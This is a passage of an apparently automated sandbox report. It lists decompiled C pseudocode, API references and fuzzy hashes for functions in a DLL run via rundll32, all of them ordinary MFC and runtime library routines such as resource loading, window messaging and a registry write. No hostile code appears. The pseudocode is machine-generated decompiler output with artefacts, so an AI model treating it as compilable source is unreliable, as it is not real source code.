						if(_t35 == 0) {
							L12:
							if( *((intOrPtr*)(_t66 + 0x98)) != 0) {
								_t36 =  *((intOrPtr*)(_t70 + 0xc));
								_a4 = _a4 & 0x00000000;
								_t83 = _t36;
								if(_t36 != 0) {
									_push(_t36);
									_t39 = E1001A023(_t51, _t64, _t66, _t70, _t83);
									_push( *((intOrPtr*)(_t70 + 0xc)));
									_a4 = _t39;
									E10016380(_t51, _t66, _t70, _t83);
								}
								_t37 = E1001703B(_t51, _t64, _t66, _t70,  *((intOrPtr*)(_t66 + 0x98)));
								 *((intOrPtr*)(_t70 + 0xc)) = _t37;
								if(_t37 == 0 && _a4 != _t37) {
									 *((intOrPtr*)(_t70 + 0xc)) = E1001703B(_t51, _t64, _t66, _t70, _a4);
								}
							}
							goto L18;
						}
						_push(_t35);
						if(E1001A023(_t51, _t64, _t66, _t70, _t80) >=  *((intOrPtr*)(_t66 + 0x98))) {
							goto L18;
						}
						goto L12;
					}
				}
				if(_a4 != 0xffffffff) {
					_t47 = E1000B510();
					if(_t47 != 0) {
						_t48 =  *((intOrPtr*)(_t47 + 0x3c));
						_t77 = _t48;
						if(_t48 != 0) {
							 *_t48(0, 0);
						}
					}
				}
				E100144ED( *((intOrPtr*)(_t51 + 0x20)), _t65);
				E100144ED( *((intOrPtr*)(_t51 + 0x1c)), _t65);
				E100144ED( *((intOrPtr*)(_t51 + 0x18)), _t65);
				E100144ED( *((intOrPtr*)(_t51 + 0x14)), _t65);
				E100144ED( *((intOrPtr*)(_t51 + 0x24)), _t65);
				goto L8;
			}

APIs

__msize.LIBCMT ref: 1001464A
__msize.LIBCMT ref: 1001466D
_malloc.LIBCMT ref: 10014685
_malloc.LIBCMT ref: 1001469A

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: __msize_malloc
String ID:
API String ID: 1288803200-0
Opcode ID: f4a42d07282e480ba19c61c33f8d9b2ab7007992bfdb09378e69a2fee1890d3d
Instruction ID: c51f58ba7030090f65d8388f2f6216d6b95cef8c4540db251b535ec9dede0d79
Opcode Fuzzy Hash: f4a42d07282e480ba19c61c33f8d9b2ab7007992bfdb09378e69a2fee1890d3d
Instruction Fuzzy Hash: 2E21F375500A019FCB55DF34D881B5A73E4FF05298B22842AE869DF266DF30ECC1CB82

Uniqueness

Uniqueness Score: -1.00%

Function 10009D34, Relevance: 6.1, APIs: 4, Instructions: 58
windowCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 87%

			E10009D34(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, intOrPtr _a8, char _a12) {
				intOrPtr* _v0;
				void* _v4;
				signed int _v8;
				intOrPtr _v16;
				void* _t20;
				intOrPtr* _t23;
				void* _t29;
				void* _t31;
				intOrPtr _t35;
				char _t36;
				void* _t40;
				void* _t42;
				void* _t44;

				_t44 = __eflags;
				_t38 = __esi;
				_t37 = __edi;
				_t31 = __ebx;
				_push(4);
				E10017BC1(E10027DA5, __ebx, __edi, __esi);
				_t35 = E10009B91(_t44, 0xc);
				_v16 = _t35;
				_t20 = 0;
				_v4 = 0;
				if(_t35 != 0) {
					_t20 = E10009CDE(_t35);
				}
				_t36 = _a4;
				_v8 = _v8 | 0xffffffff;
				 *((intOrPtr*)(_t20 + 8)) = _t36;
				_a4 = _t20;
				E10017C83( &_a4, 0x1002e16c);
				asm("int3");
				_t40 = _t42;
				_t23 = _v0;
				_push(_t31);
				if(_t23 != 0) {
					 *_t23 = 0;
				}
				if(FormatMessageA(0x1100, 0,  *(_t36 + 8), 0x800,  &_a12, 0, 0) != 0) {
					E10009C0D(0, _t36, _t37, _t38, _t40, _a4, _a8, _a12, 0xffffffff);
					LocalFree(_a12);
					_t29 = 1;
					__eflags = 1;
				} else {
					 *_a4 = 0;
					_t29 = 0;
				}
				return _t29;
			}

APIs

__EH_prolog3.LIBCMT ref: 10009D3B

Part of subcall function 10009B91: _malloc.LIBCMT ref: 10009BAB

__CxxThrowException@8.LIBCMT ref: 10009D71
FormatMessageA.KERNEL32(00001100,00000000,8007000E,00000800,?,00000000,00000000,?,?,8007000E,1002E16C,00000004,1000105C,8007000E), ref: 10009D9A

Part of subcall function 10009C0D: _wctomb_s.LIBCMT ref: 10009C1D

LocalFree.KERNEL32(?), ref: 10009DC3

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc_wctomb_s
String ID:
API String ID: 1615547351-0
Opcode ID: e381bce633557ad048b1696ea26053178c542294b2cd97fac3bd263aaafec7a1
Instruction ID: 2087144037a306e6c8b96e697859ee983d4da7c50e84c085b7e4f49f0a09e647
Opcode Fuzzy Hash: e381bce633557ad048b1696ea26053178c542294b2cd97fac3bd263aaafec7a1
Instruction Fuzzy Hash: 1E1170B1644249AFEB00DFA4DC81DAE3BA9FB04390F21452AF629CA1D1D731D9508B51

Uniqueness

Uniqueness Score: -1.00%

Function 1000C887, Relevance: 6.1, APIs: 4, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E1000C887(void* __ecx) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t23;
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t32;
				signed int _t34;
				signed short _t35;
				void* _t37;
				signed short* _t40;

				_push(__ecx);
				_push(_t28);
				_t37 = __ecx;
				_t42 =  *((intOrPtr*)(__ecx + 0x58));
				_t40 =  *(__ecx + 0x60);
				_v8 =  *((intOrPtr*)(__ecx + 0x5c));
				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
					_t32 =  *(E1000D5EC(_t28, __ecx, _t40, _t42) + 0xc);
					_v8 = LoadResource(_t32, FindResourceA(_t32,  *(_t37 + 0x58), 5));
				}
				if(_v8 != 0) {
					_t40 = LockResource(_v8);
				}
				_t30 = 1;
				if(_t40 != 0) {
					_t35 =  *_t40;
					if(_t40[1] != 0xffff) {
						_t23 = _t40[5] & 0x0000ffff;
						_t34 = _t40[6] & 0x0000ffff;
					} else {
						_t35 = _t40[6];
						_t23 = _t40[9] & 0x0000ffff;
						_t34 = _t40[0xa] & 0x0000ffff;
					}
					if((_t35 & 0x00001801) != 0 || _t23 != 0 || _t34 != 0) {
						_t30 = 0;
					}
				}
				if( *(_t37 + 0x58) != 0) {
					FreeResource(_v8);
				}
				return _t30;
			}

APIs

FindResourceA.KERNEL32(?,00000000,00000005), ref: 1000C8AD
LoadResource.KERNEL32(?,00000000), ref: 1000C8B5
LockResource.KERNEL32(00000000), ref: 1000C8C7
FreeResource.KERNEL32(00000000), ref: 1000C911

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: ba0e54e7ba739e7dbb3db6c45d0c9dd504ce55cc39771a4365ee787ff2243026
Instruction ID: fb1a28c5f31200e3abd4209bdb6f3add133a5505808a0a6cde1b54a47ab738f1
Opcode Fuzzy Hash: ba0e54e7ba739e7dbb3db6c45d0c9dd504ce55cc39771a4365ee787ff2243026
Instruction Fuzzy Hash: 46118F3150076AEFE710DF95C889AAAB3F5FF003D5F218029E84252594D770ED50D760

Uniqueness

Uniqueness Score: -1.00%

Function 1000ADB5, Relevance: 6.1, APIs: 4, Instructions: 56
threadCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E1000ADB5(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t37;
				intOrPtr _t43;
				void* _t45;
				intOrPtr* _t51;
				void* _t52;
				void* _t53;

				_t53 = __eflags;
				_t46 = __ecx;
				_t44 = __ebx;
				_push(4);
				E10017BC1(E10027E86, __ebx, __edi, __esi);
				_t51 = __ecx;
				 *((intOrPtr*)(_t52 - 0x10)) = __ecx;
				E1000B862(__ebx, __ecx, __edi, __ecx, _t53);
				_t54 =  *((intOrPtr*)(_t52 + 8));
				 *((intOrPtr*)(_t52 - 4)) = 0;
				 *_t51 = 0x10029f54;
				if( *((intOrPtr*)(_t52 + 8)) == 0) {
					 *((intOrPtr*)(_t51 + 0x50)) = 0;
				} else {
					_t43 = E1001817A( *((intOrPtr*)(_t52 + 8)));
					_pop(_t46);
					 *((intOrPtr*)(_t51 + 0x50)) = _t43;
				}
				_t45 = E1000D5EC(_t44, 0, _t51, _t54);
				_t55 = _t45;
				if(_t45 == 0) {
					L4:
					E1000A0DB(_t45, _t46, 0, _t51, _t55);
				}
				_t7 = _t45 + 0x74; // 0x74
				_t46 = _t7;
				_t37 = E1000AA21(_t45, _t7, 0, _t51, _t55);
				if(_t37 == 0) {
					goto L4;
				}
				 *((intOrPtr*)(_t37 + 4)) = _t51;
				 *((intOrPtr*)(_t51 + 0x2c)) = GetCurrentThread();
				 *((intOrPtr*)(_t51 + 0x30)) = GetCurrentThreadId();
				 *((intOrPtr*)(_t45 + 4)) = _t51;
				 *((intOrPtr*)(_t51 + 0x44)) = 0;
				 *((intOrPtr*)(_t51 + 0x7c)) = 0;
				 *((intOrPtr*)(_t51 + 0x64)) = 0;
				 *((intOrPtr*)(_t51 + 0x68)) = 0;
				 *((intOrPtr*)(_t51 + 0x54)) = 0;
				 *((intOrPtr*)(_t51 + 0x60)) = 0;
				 *((intOrPtr*)(_t51 + 0x88)) = 0;
				 *((intOrPtr*)(_t51 + 0x58)) = 0;
				 *((short*)(_t51 + 0x92)) = 0;
				 *((short*)(_t51 + 0x90)) = 0;
				 *((intOrPtr*)(_t51 + 0x48)) = 0;
				 *((intOrPtr*)(_t51 + 0x8c)) = 0;
				 *((intOrPtr*)(_t51 + 0x80)) = 0;
				 *((intOrPtr*)(_t51 + 0x84)) = 0;
				 *((intOrPtr*)(_t51 + 0x70)) = 0;
				 *((intOrPtr*)(_t51 + 0x74)) = 0;
				 *((intOrPtr*)(_t51 + 0x94)) = 0;
				 *((intOrPtr*)(_t51 + 0x9c)) = 0;
				 *((intOrPtr*)(_t51 + 0x5c)) = 0;
				 *((intOrPtr*)(_t51 + 0x6c)) = 0;
				 *((intOrPtr*)(_t51 + 0x98)) = 0x200;
				return E10017C60(_t51);
			}

APIs

__EH_prolog3.LIBCMT ref: 1000ADBC

Part of subcall function 1000B862: __EH_prolog3.LIBCMT ref: 1000B869

__strdup.LIBCMT ref: 1000ADDE
GetCurrentThread.KERNEL32 ref: 1000AE0B
GetCurrentThreadId.KERNEL32 ref: 1000AE14

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: CurrentH_prolog3Thread$__strdup
String ID:
API String ID: 4206445780-0
Opcode ID: 9c26e9d60202904c8b3007aba5d4454f2b931d5449d83442688f904a073da271
Instruction ID: f8307bcc4145d2f3034cc24c4785684ef343d47fe4738e0b5029f7ba663f9659
Opcode Fuzzy Hash: 9c26e9d60202904c8b3007aba5d4454f2b931d5449d83442688f904a073da271
Instruction Fuzzy Hash: 88217EB4800B50CFE721DF6A858564AFBF8FFA4680F10891FD59A87A25CBB0A581CF45

Uniqueness

Uniqueness Score: -1.00%

Function 1001170E, Relevance: 6.1, APIs: 4, Instructions: 55
windowCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E1001170E(intOrPtr* __ecx) {
				char _v20;
				intOrPtr _v32;
				void* __ebx;
				void* __edi;
				intOrPtr* __esi;
				struct HWND__* _t18;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t33;

				_t28 = __ecx;
				_push(0);
				_t33 = __ecx;
				if( *((intOrPtr*)( *__ecx + 0x120))() != 0) {
					__eax =  *__esi;
					__ecx = __esi;
					__eax =  *((intOrPtr*)( *__esi + 0x170))();
				}
				_t30 = SendMessageA;
				SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
				E1001044A(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
				_t28 = _t33;
				_t33 = E10010DEC(0, _t28, SendMessageA);
				if(_t33 != 0) {
					SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
					E1001044A(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
					_t18 = GetCapture();
					if(_t18 != 0) {
						_t18 = SendMessageA(_t18, 0x1f, 0, 0);
					}
					return _t18;
				} else {
					_push(_t28);
					_v20 = 0x10057298;
					E10017C83( &_v20, 0x1002e2fc);
					asm("int3");
					_push(4);
					E10017BC1(E10027DEC, 0, SendMessageA, _t33);
					_t29 = E10013965(0x104);
					_v32 = _t29;
					_t24 = 0;
					_v20 = 0;
					if(_t29 != 0) {
						_t24 = E1000CF71(_t29);
					}
					return E10017C60(_t24);
				}
			}

APIs

SendMessageA.USER32 ref: 10011738
SendMessageA.USER32 ref: 10011763

Part of subcall function 1001044A: GetTopWindow.USER32(00000000), ref: 10010458

GetCapture.USER32 ref: 10011775
SendMessageA.USER32 ref: 10011784

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: MessageSend$CaptureWindow
String ID:
API String ID: 729421689-0
Opcode ID: 80fe9e985e59ca35730d0e4f98e874e27816f3184ada4d3ba37fa42bed1d0644
Instruction ID: c1fa24ad5068faa30316ff7830c17e6e1fa791912a80157e4ea929c0746033bf
Opcode Fuzzy Hash: 80fe9e985e59ca35730d0e4f98e874e27816f3184ada4d3ba37fa42bed1d0644
Instruction Fuzzy Hash: EF012CB5350219BFF621AB608CC9FBA36ADEB487C4F010539F685AA1E2C6A19C415660

Uniqueness

Uniqueness Score: -1.00%

Function 10013F17, Relevance: 6.1, APIs: 4, Instructions: 55
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E10013F17(void* __ecx, intOrPtr __edx, CHAR* _a4, char* _a8, char _a12) {
				signed int _v8;
				char _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				CHAR* _t21;
				char* _t24;
				intOrPtr _t28;
				void* _t30;
				signed int _t31;

				_t28 = __edx;
				_t13 =  *0x10057a08; // 0xfbf2b489
				_v8 = _t13 ^ _t31;
				_t24 = _a8;
				_t30 = __ecx;
				_t29 = _a4;
				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
					E10016DF0( &_v24, 0x10, "%d", _a12);
					_t18 = WritePrivateProfileStringA(_t29, _t24,  &_v24,  *(__ecx + 0x68));
				} else {
					_t30 = E10013ED1(__ecx, _t29);
					if(_t30 != 0) {
						_t21 = RegSetValueExA(_t30, _t24, 0, 4,  &_a12, 4);
						_t29 = _t21;
						RegCloseKey(_t30);
						_t18 = 0 | _t21 == 0x00000000;
					}
				}
				return E100167D5(_t18, _t24, _v8 ^ _t31, _t28, _t29, _t30);
			}

APIs

RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 10013F50
RegCloseKey.ADVAPI32(00000000), ref: 10013F59
_swprintf.LIBCMT ref: 10013F76
WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 10013F87

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: ClosePrivateProfileStringValueWrite_swprintf
String ID:
API String ID: 4210924919-0
Opcode ID: 72724b54134d1e17f7023dcd4e88edc389080316b6c32af13a85a47034679497
Instruction ID: 30a1eb16c1be1d822a6ca59f9e75d62d608c78195c8382286e316af6553577e2
Opcode Fuzzy Hash: 72724b54134d1e17f7023dcd4e88edc389080316b6c32af13a85a47034679497
Instruction Fuzzy Hash: 25018076900219BBDB00DF648C85FAF77BCEF48754F104469FA01AB181DA74E94597A4

Uniqueness

Uniqueness Score: -1.00%

Function 1000B244, Relevance: 6.0, APIs: 4, Instructions: 50
windowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E1000B244(void* __ecx, void* __edi, void* __ebp, signed int _a4) {
				void* __ebx;
				void* __esi;
				void* _t16;
				int _t17;
				int _t18;
				struct HWND__* _t19;
				intOrPtr _t25;
				intOrPtr _t33;
				void* _t35;

				_t32 = __edi;
				_t35 = __ecx;
				_t25 =  *((intOrPtr*)(__ecx + 0xc));
				if(_t25 == 0) {
					__eflags =  *((intOrPtr*)(__ecx + 0x14));
					if(__eflags == 0) {
						L3:
						_t17 = E1000A0DB(0, _t25, _t32, _t35, _t39);
						L4:
						asm("sbb edx, edx");
						_t18 = EnableMenuItem( *(_t25 + 4), _t17, ( ~_a4 & 0xfffffffd) + 0x00000003 | 0x00000400);
						L11:
						 *((intOrPtr*)(_t35 + 0x18)) = 1;
						return _t18;
					}
					__eflags = _a4;
					if(_a4 == 0) {
						_push(__edi);
						_t33 =  *((intOrPtr*)(__ecx + 0x14));
						_t19 = GetFocus();
						__eflags = _t19 -  *(_t33 + 0x20);
						if(_t19 ==  *(_t33 + 0x20)) {
							SendMessageA( *(E1000FB5C(0, _t25, __ebp, GetParent( *(_t33 + 0x20))) + 0x20), 0x28, 0, 0);
						}
					}
					_t18 = E10012913( *((intOrPtr*)(_t35 + 0x14)), _a4);
					goto L11;
				}
				if( *((intOrPtr*)(__ecx + 0x10)) == 0) {
					_t17 =  *(__ecx + 8);
					_t39 = _t17 -  *((intOrPtr*)(__ecx + 0x20));
					if(_t17 <  *((intOrPtr*)(__ecx + 0x20))) {
						goto L4;
					}
					goto L3;
				}
				return _t16;
			}

APIs

EnableMenuItem.USER32 ref: 1000B27C

Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC

GetFocus.USER32 ref: 1000B293
GetParent.USER32(?), ref: 1000B2A1
SendMessageA.USER32 ref: 1000B2B4

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: EnableException@8FocusH_prolog3ItemMenuMessageParentSendThrow
String ID:
API String ID: 3849708097-0
Opcode ID: 716c6444658c0fcd22857925786988681d98949d7d446b879da325b0eb7e7aaf
Instruction ID: 6f1bf2e13571d4607552996c72993327e3919edcc1f96bcd7a145644f4ad6856
Opcode Fuzzy Hash: 716c6444658c0fcd22857925786988681d98949d7d446b879da325b0eb7e7aaf
Instruction Fuzzy Hash: FB115B71500A11AFE720DF64CCC9D1EBBF6FF893A5B118A2DF186869A8C731AC45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1001044A, Relevance: 6.0, APIs: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E1001044A(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, int _a12, long _a16, struct HWND__* _a20, struct HWND__* _a24) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t16;
				struct HWND__* _t18;
				struct HWND__* _t20;
				void* _t22;
				void* _t23;
				void* _t24;
				struct HWND__* _t25;

				_t23 = __ecx;
				_t22 = __ebx;
				_t24 = GetTopWindow;
				_t16 = GetTopWindow(_a4);
				while(1) {
					_t25 = _t16;
					if(_t25 == 0) {
						break;
					}
					__eflags = _a24;
					if(__eflags == 0) {
						SendMessageA(_t25, _a8, _a12, _a16);
					} else {
						_t20 = E1000FB83(_t23, _t24, _t25, __eflags, _t25);
						__eflags = _t20;
						if(__eflags != 0) {
							_push(_a16);
							_push(_a12);
							_push(_a8);
							_push( *((intOrPtr*)(_t20 + 0x20)));
							_push(_t20);
							E1001016F(_t22, _t24, _t25, __eflags);
						}
					}
					__eflags = _a20;
					if(_a20 != 0) {
						_t18 = GetTopWindow(_t25);
						__eflags = _t18;
						if(_t18 != 0) {
							E1001044A(_t22, _t23, _t25, _a8, _a12, _a16, _a20, _a24);
						}
					}
					_t16 = GetWindow(_t25, 2);
				}
				return _t16;
			}

APIs

GetTopWindow.USER32(00000000), ref: 10010458
GetTopWindow.USER32(00000000), ref: 10010497
GetWindow.USER32(00000000,00000002), ref: 100104B5

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: bfa56acb45854e1eb2d8939f4edd14d374eedcc28d24ff6845afa1ef48a187dc
Instruction ID: cb0d0bbe13ee34529c330f041d0b53c98759dff42d13bab1c22f515cd31b8fc3
Opcode Fuzzy Hash: bfa56acb45854e1eb2d8939f4edd14d374eedcc28d24ff6845afa1ef48a187dc
Instruction Fuzzy Hash: CD01257620061ABBDF12DF908C44E9F3A6AEF08390F018014FE8458060C7B6D9A2EBA5

Uniqueness

Uniqueness Score: -1.00%

Function 100223DD, Relevance: 6.0, APIs: 4, Instructions: 48
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E100223DD(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;
				void* _t29;

				_t28 = __ebx;
				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E10021CDA(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E10021DC6(_t28, _t29, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E100222E5(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E1002222C(_t29, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

APIs

__cftof_l.LIBCMT ref: 10022401

Part of subcall function 1002222C: __fltout2.LIBCMT ref: 10022256

__cftog_l.LIBCMT ref: 10022427
__cftoe_l.LIBCMT ref: 10022459

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
Instruction ID: 8dbc0b72f00ea763734ae0c8b1a7260823f108f727578f4f2c9ad294c4834352
Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
Instruction Fuzzy Hash: 4201287A40014ABBCF12AEC4EC41CEE3F66FB18294B958515FE1858531D236D9B2AB81

Uniqueness

Uniqueness Score: -1.00%

Function 1000FE47, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E1000FE47(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t9;
				struct HWND__* _t10;
				void* _t14;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				void* _t18;

				_t14 = __ecx;
				_t13 = __ebx;
				_t9 = GetDlgItem(_a4, _a8);
				_t15 = GetTopWindow;
				_t16 = _t9;
				if(_t16 == 0) {
					L6:
					_t10 = GetTopWindow(_a4);
					while(1) {
						_t17 = _t10;
						__eflags = _t17;
						if(_t17 == 0) {
							goto L10;
						}
						_t10 = E1000FE47(_t13, _t14, _t17, _a8, _a12);
						__eflags = _t10;
						if(_t10 == 0) {
							_t10 = GetWindow(_t17, 2);
							continue;
						}
						goto L10;
					}
				} else {
					if(GetTopWindow(_t16) == 0) {
						L3:
						_push(_t16);
						if(_a12 == 0) {
							return E1000FB5C(_t13, _t14, _t18);
						}
						_t10 = E1000FB83(_t14, _t15, _t16, __eflags);
						__eflags = _t10;
						if(_t10 == 0) {
							goto L6;
						}
					} else {
						_t10 = E1000FE47(__ebx, _t14, _t16, _a8, _a12);
						if(_t10 == 0) {
							goto L3;
						}
					}
				}
				L10:
				return _t10;
			}

APIs

GetDlgItem.USER32 ref: 1000FE52
GetTopWindow.USER32(00000000), ref: 1000FE65

Part of subcall function 1000FE47: GetWindow.USER32(00000000,00000002), ref: 1000FEAC

GetTopWindow.USER32(?), ref: 1000FE95

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

